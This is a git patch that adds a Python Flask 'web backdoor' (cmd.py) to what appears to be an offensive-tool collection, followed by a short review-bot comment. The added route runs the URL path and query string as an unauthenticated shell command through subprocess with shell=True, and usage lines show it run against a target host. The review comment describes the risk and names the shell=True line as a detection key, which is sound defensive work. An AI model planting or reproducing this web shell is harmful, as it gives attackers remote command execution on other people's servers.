From 3b10852409073557211a9948ad9818511ba09e71 Mon Sep 17 00:00:00 2001
From: Fabio Delgado
Date: Mon, 31 Aug 2020 14:17:10 -0300
Subject: [PATCH] adding the feature for web backdoors using python. The flask framework was used for web development but can also be used only python
---
web-backdoors/py/cmd.py | 48 +++++++++++++++++++++++++++++++++++++++++
1 file changed, 48 insertions(+)
create mode 100644 web-backdoors/py/cmd.py
diff --git a/web-backdoors/py/cmd.py b/web-backdoors/py/cmd.py
new file mode 100644
index 00000000..44b00bea
--- /dev/null
+++ b/web-backdoors/py/cmd.py
@@ -0,0 +1,48 @@
+import subprocess
+from flask import Flask, request,escape
+
+app = Flask(__name__)
+
+@app.route('/cmd/')
+def hello_world(variable):
+ cmd = escape(variable)
+
+ ## join arguments from request
+ if request.args:
+ cmd += '?'
+ cmd += '&'.join([f'{k}={v}' for k, v in request.args.items()])
+
+ ## remove HTML Character Entities from request command
+ saida = html_decode(str(cmd))
+
+ ## executing command
+ result = subprocess.check_output(saida, shell=True)
+
+ return (result)
+
+def html_decode(s):
+ """
+ Returns the ASCII decoded version of the given HTML string. This does
+ NOT remove normal HTML tags like

.
+ """
+ htmlCodes = (
+ ("'", '''),
+ ('"', '"'),
+ ('>', '>'),
+ ('<', '<'),
+ ('&', '&')
+ )
+ for code in htmlCodes:
+ s = s.replace(code[1], code[0])
+ return s
+
+if __name__ == '__main__':
+ app.run()
+
+
+## Usage: http://target/cmd/whoami
+## Usage: http://target/cmd/cd.. & dir
+
+# by: Fabio Delgado
+# modified: 31/08/2020
+
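Review bot: `hello_world` feeds the request path and query string into `subprocess.check_output(saida, shell=True)` with no authentication or allow-list, and nothing in the file documents that; the only description is the two `## Usage` lines at the bottom. I would add a module docstring such as `"""Flask route that runs the request path and query string as a shell command with the server's privileges; unauthenticated."""` and give the handler a descriptive name so the file cannot be mistaken for a sample app. The `escape(variable)` call followed by `html_decode(str(cmd))` looks like a round trip that cancels itself out (inferred, since the entity literals in `htmlCodes` are rendered decoded on this page), which deserves a one-line comment explaining why both steps are there. For anyone writing detections or code-review rules, the `shell=True` call whose argument derives from `request` data is the line to key on.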